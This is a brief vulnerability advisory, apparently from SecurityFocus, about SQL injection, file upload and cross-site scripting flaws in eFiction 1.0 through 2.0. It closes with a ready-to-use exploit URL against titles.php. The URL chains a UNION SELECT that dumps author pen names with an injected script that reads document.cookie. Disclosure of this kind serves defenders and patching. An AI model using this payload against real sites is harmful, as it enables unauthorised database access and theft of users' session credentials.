10 lines
No EOL
695 B
Text
10 lines
No EOL
695 B
Text
source: http://www.securityfocus.com/bid/15568/info
|
|
|
|
eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities.
|
|
|
|
These vulnerabilities may allow an attacker to view and modify sensitive information, gain unauthorized access, modify and corrupt the underlying database application, and obtain a victim's authentication credentials.
|
|
|
|
eFiction versions 1.0, 1.1 and 2.0 are reported to be vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)</script>'
|
|
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/* |